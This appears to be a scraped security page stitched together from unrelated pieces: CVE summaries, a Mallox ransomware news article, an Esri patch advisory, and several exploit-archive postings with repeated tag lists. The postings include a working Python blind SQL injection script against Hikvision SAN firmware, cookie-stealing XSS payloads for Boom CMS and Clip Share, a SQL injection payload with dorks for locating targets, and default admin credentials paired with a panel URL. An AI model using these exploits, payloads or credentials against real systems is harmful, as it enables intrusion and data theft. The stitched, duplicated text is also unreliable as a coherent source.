A vulnerability was found in IBOS OA 4.5.5 and classified as critical. Affected by this issue is the function actionExport of the file ?r=contact/default/export of the component Personal Office Address Book. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-235058 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-3791

Mallox ransomware activities in 2023 have witnessed a 174% increase when compared to the previous year, new findings from Palo Alto Networks Unit 42 reveal.
"Mallox ransomware, like many other ransomware threat actors, follows the double extortion trend: stealing data before encrypting an organization's files, and then threatening to publish the stolen data on a leak site as leverage to convince

Endpoint Security / Data Safety

Mallox ransomware activities in 2023 have witnessed a 174% increase when compared to the previous year, new findings from Palo Alto Networks Unit 42 reveal.

"Mallox ransomware, like many other ransomware threat actors, follows the double extortion trend: stealing data before encrypting an organization's files, and then threatening to publish the stolen data on a leak site as leverage to convince victims to pay the ransom fee," security researchers Lior Rochberger and Shimi Cohen said in a new report shared with The Hacker News.

Mallox is linked to a threat actor that's also linked to other ransomware strains, such as TargetCompany, Tohnichi, Fargo, and, most recently, Xollam. It first burst onto the scene in June 2021.

Some of the prominent sectors targeted by Mallox are manufacturing, professional and legal services, and wholesale and retail.

A notable aspect of the group is its pattern of exploiting poorly secured MS-SQL servers via dictionary attacks as a penetration vector to compromise victims' networks. Xollam is a deviation from the norm in that it has been observed using malicious OneNote file attachments for initial access, as detailed by Trend Micro last month.

Upon gaining a successful foothold on the infected host, a PowerShell command is executed to retrieve the ransomware payload from a remote server.

The binary, for its part, attempts to stop and remove SQL-related services, delete volume shadow copies, clear system event logs, terminate security-related processes, and bypass Raccine, an open-source tool designed to counter ransomware attacks, prior to commencing its encryption process, after which a ransom note is dropped in every directory.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

TargetCompany remains a small, closed group, but it has also been observed recruiting affiliates for the Mallox ransomware-as-a-service (RaaS) affiliate program on the RAMP cybercrime forum.

The development comes as ransomware continues to be a lucrative financial scheme, netting cybercriminals no less than $449.1 million in the first half of 2023 alone, per Chainalysis.

"The Mallox ransomware group has been more active in the past few months, and their recent recruiting efforts may enable them to attack more organizations if the recruitment drive is successful," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Mallox Ransomware Exploits Weak MS-SQL Servers to Breach Networks

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.88

Hikvision Hybrid SAN Ds-a71024 firmware suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution# Date: 16  July 2023# Exploit Author: Thurein Soe# CVE : CVE-2022-28171# Vendor Homepage: https://www.hikvision.com# Software Link: N/A# Refence Link: https://cve.report/CVE-2022-28171# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s'''Vendor Description:Hikvision is a world-leading surveillance manufacturer and supplier ofvideo surveillance and Internet of Things (IoT) equipment for civilian andmilitary purposes.Some Hikvision Hybrid SAN products were vulnerable to multiple remote codeexecution vulnerabilities such as command injection, Blind SQL injection,HTTP request smuggling, and reflected cross-site scripting.This resulted in remote code execution that allows an adversary to executearbitrary operating system commands and more. However, an adversary must beon the same network to leverage this vulnerability to execute arbitrarycommands.Vulnerability description:A manual test confirmed that The download type parameter was vulnerable toBlind SQL injection.I created a Python script to automate and enumerate SQLversions as the Application was behind the firewall and block all therequests from SQLmap.Request Body:GET/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'HTTP/1.1Host: X.X.X.X.12:2004Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36Connection: closePOC:'''import requestsimport timeurl = "http://X.X.X.X:2004/web/log/dynamic_log.php"# Function to check if the response time is greater than the specified delaydef is_response_time_delayed(response_time, delay):    return response_time >= delay# Function to perform blind SQL injection and check the response timedef perform_blind_sql_injection(payload):    proxies = {        'http': 'http://localhost:8080',        'https': 'http://localhost:8080',    }    params = {        'target': 'makeMaintainLog',        'downloadtype': payload    }    headers = {        'Accept-Encoding': 'gzip, deflate',        'Accept': '*/*',        'Accept-Language': 'en',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',        'Connection': 'close'    }    start_time = time.time()    response = requests.get(url, headers=headers, params=params,proxies=proxies)    end_time = time.time()    response_time = end_time - start_time    return is_response_time_delayed(response_time, 20)# Enumerate the MySQL versiondef enumerate_mysql_version():    version_Name = ''    sleep_time = 10  # Sleep time is 10 seconds    payloads = [        f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},SLEEP({sleep_time}), 0))-- -"        for i in range(1, 11)        for mid in range(256)    ]    for payload in payloads:        if perform_blind_sql_injection(payload):            mid = payload.split("=")[-1].split(",")[0]            version_Name += chr(int(mid))    return version_Name# Enumeration is completedversion_Name = enumerate_mysql_version()print("MySQL version is:", version_Name)

Hikvision Hybrid SAN Ds-a71024 SQL Injection

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

Posted Jul 20, 2023

Authored by indoushka

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | e614477d10fc119020f0bb6bfcef55d3cf59f2217502dd441fe065c9b47251c1

Download | Favorite | View

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

    ====================================================================================================================================| # Title     : CMS Nexin Adminisztrációs Központ v1.2 Insecure Settings Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://www.composeit.hu/                                                                                           |  | # Dork      : Nexin Adminisztrációs Központ v1.2                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Panel : http://discocenterhu/admin/[+] User : root & pass : job314Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,726)
*   Arbitrary (16,152)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,360)
*   Encryption (2,365)
*   Exploit (51,612)
*   File Inclusion (4,208)
*   File Upload (965)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,032)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,661)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,661)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,303)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,709)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,857)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,229)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,590)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,754)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings

CMS iQ-Digital version 2.0 suffers from a cross site scripting vulnerability.

**CMS iQ-Digital 2.0 Cross Site Scripting**

Posted Jul 20, 2023

Authored by indoushka

CMS iQ-Digital version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3320c1901d54ffd35aac7dcb03095b447934214a707ed6d7ebb3179839c2a7c6

Download | Favorite | View

**CMS iQ-Digital 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMS iQ-Digital v2.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://iq-medya.net.tr                                                                                            |  | # Dork      : intext:''Tasarım iQ Digital''                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /tr/blog.php?page=<script>alert(/indoushka/);</script>[+]  http://127.0.0.1/uzmangayrimenkulcomtr/tr/blog.php?page=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,726)
*   Arbitrary (16,152)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,360)
*   Encryption (2,365)
*   Exploit (51,612)
*   File Inclusion (4,208)
*   File Upload (965)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,032)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,661)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,661)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,303)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,709)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,857)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,229)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,590)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,754)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS iQ-Digital 2.0 Cross Site Scripting

CMS porViaX version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMS porViaX v2.0 Sql Injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit)                                             | | # Vendor    : https://codecanyon.net/                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : noticias?pg=\[+] http://127.0.0.1/muritiba.ba.govbr/noticias?pg=%5c <==== inject here[+] Login http://127.0.0.1/muritiba.ba.govbr/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS porViaX 2.0 SQL Injection


There is SQL injection vulnerability in Esri ArcGIS Insights 2022.1 for ArcGIS Enterprise and that may allow a remote, authorized attacker to execute arbitrary SQL commands against the back-end database. The effort required to generate the crafted input required to exploit this issue is complex and requires significant effort before a successful attack can be expected.



Esri has released ArcGIS Insights Security Patches for ArcGIS Insights 2022.1. These patches resolve high severity security vulnerabilities in ArcGIS Insights Desktop (Windows and Mac), ArcGIS Enterprise on Windows, ArcGIS Server and Portal for ArcGIS on Linux either as the base deployment or the primary ArcGIS connection.

These patches were released on June 23, 2023 and are available here.

We provide Common Vulnerability Scoring System v.3.1 (CVSS) scores to allow our customers to better assess risk of these vulnerabilities to their operations.  Both base and modified temporal scores are provided to reflect the availability of an official patch.

****Vulnerabilities fixed by this patch:****

**There is SQL injection vulnerability** in Esri ArcGIS Insights 2022.1 for ArcGIS Enterprise and that may allow a remote, authorized attacker to execute arbitrary SQL commands against the back-end database. The effort required to generate the crafted input required to exploit this issue is complex and requires significant effort before a successful attack can be expected.

*   **CVE Details:**CVE-2023-25838
*   **Esri BUG ID: \[**BUG-000157278 **– ArcGIS Insights has a security vulnerability.\]**
*   CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
*   Base CVSSv31: 7.5 /AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
*   Environmentally Modified CVSSv3.1: 7.2  /AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/

**There is SQL injection vulnerability** in Esri ArcGIS Insights Desktop for Mac and Windows version 2022.1  that may allow a local, authorized attacker to execute arbitrary SQL commands against the back-end database. The effort required to generate the crafted input required to exploit this issue is complex and requires significant effort before a successful attack can be expected.

*   **CVE Details:**CVE-2023-25839
*   **Esri BUG ID: \[**BUG-000157278 **– ArcGIS Insights has a security vulnerability.\]**
*   CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
*   Base CVSSv31: 7.0 /AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
*   Environmentally Modified CVSSv3.1: 6.7  /AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/RL:O

Install the provided patches to remediate these issues.

CVE-2023-25838: ArcGIS Insights Security Patches for ArcGIS Insights 2022.1 are now available

Boom CMS version 8.0.7 suffers from a cross site scripting vulnerability.

    Document Title:===============Boom CMS v8.0.7 - Cross Site Scripting VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2274Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2274Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes lifeeasy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.It gives editors control but doesn't require any technical knowledge.(Copy of the Homepage:https://www.boomcms.net/boom-boom  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.Affected Product(s):====================UXB LondonProduct: Boom v8.0.7 - Content Management System (Web-Application)Vulnerability Disclosure Timeline:==================================2022-07-24: Researcher Notification & Coordination (Security Researcher)2022-07-25: Vendor Notification (Security Department)2023-**-**: Vendor Response/Feedback (Security Department)2023-**-**: Vendor Fix/Patch (Service Developer Team)2023-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (User Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromisebrowser to web-application requests from the application-side.The vulnerability is located in the input fields of the album title and album description in the asset-manager module.Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parsethe content by usage of a backslash. Thus does not have any impact to inject own maliciousjava-scripts because of its only performed for double- and single-quotes to prevent sql injections.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistentexternal redirects to malicious source and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Module(s):[+] assets-manager (album)Vulnerable Function(s):[+] addVulnerable Parameter(s):[+] title[+] descriptionAffected Module(s):[+] Frontend (Albums)[+] Backend (Albums Assets)Proof of Concept (PoC):=======================The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Manual steps to reproduce the vulnerability ...1. Login to the application as restricted user2. Create a new album3. Inject a test script code payload to title and description4. Save the request5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution6. Successful reproduce of the persistent cross site web vulnerability!Payload(s):><script>alert(document.cookie)</script><div style=1<a onmouseover=alert(document.cookie)>test</a>--- PoC Session Logs (Inject) ---https://localhost:8000/boomcms/album/35Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/jsonX-Requested-With: XMLHttpRequestContent-Length: 263Origin:https://localhost:8000Connection: keep-aliveReferer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Sec-Fetch-Site: same-origin{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>","slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by":null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}-PUT: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie: Max-Age=7200; path=/Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;Max-Age=7200; path=/; httponlyContent-Length: 242Connection: Keep-AliveContent-Type: application/json-https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;-GET: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie:Vary: Accept-EncodingContent-Length: 7866Connection: Keep-AliveContent-Type: text/html; charset=UTF-8-Vulnerable Source: asset-manager/albums/[ID]<li data-album="36">         <a href="#albums/20">             <div>                 <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>                 <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>                 <p class='count'><span>0</span> assets</p>             </div>         </a>     </li></iframe></p></div></a></li></ul></div></div>         </div>         <div id="b-assets-view-asset-container"></div>         <div id="b-assets-view-selection-container"></div>         <div id="b-assets-view-album-container"><div><div id="b-assets-view-album">         <div class="heading">             <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>             <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>         </div>Solution - Fix & Patch:=======================The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.Security Risk:==============The security risk of the persistent input validation web vulnerability in the application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Boom CMS 8.0.7 Cross Site Scripting

Clip Share version 4.1.4 suffers from a cross site scripting vulnerability.

**Clip Share 4.1.4 Cross Site Scripting**

Posted Jul 19, 2023

Authored by indoushka

Clip Share version 4.1.4 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | f104b1e9de39e7d0bb70da284aab85d83380acd95357f1cdeaf43197d30dc724

Download | Favorite | View

**Clip Share 4.1.4 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Clip Share 4.1.4 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.clip-share.com/                                                                                         || # Dork      : Powered By ClipShare                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Xss :   This vulnerability affects /ClipShare/signup.    URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad="   The input is reflected inside a tag parameter between double quotes.   URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad="   The input is reflected inside a tag parameter between double quotes.Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,696)
*   Arbitrary (16,150)
*   BBS (2,859)
*   Bypass (1,732)
*   CGI (1,025)
*   Code Execution (7,233)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,342)
*   Encryption (2,365)
*   Exploit (51,589)
*   File Inclusion (4,207)
*   File Upload (963)
*   Firewall (821)
*   Info Disclosure (2,752)
*   Intrusion Detection (890)
*   Java (3,009)
*   JavaScript (851)
*   Kernel (6,639)
*   Local (14,427)
*   Magazine (586)
*   Overflow (12,638)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,649)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,635)
*   Security Tool (7,873)
*   Shell (3,172)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,195)
*   SQL Injection (16,299)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,691)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,849)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,792)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,198)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,565)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,751)
*   UNIX (9,266)
*   UnixWare (186)
*   Windows (6,562)
*   Other

Tag

#sql